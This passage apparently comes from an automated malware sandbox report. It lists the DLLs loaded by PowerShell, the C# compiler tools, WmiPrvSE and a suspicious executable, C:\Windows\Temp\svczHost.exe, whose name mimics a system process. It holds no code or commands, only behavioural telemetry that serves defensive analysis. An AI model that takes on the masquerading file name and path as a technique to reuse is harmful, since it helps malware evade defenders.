      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
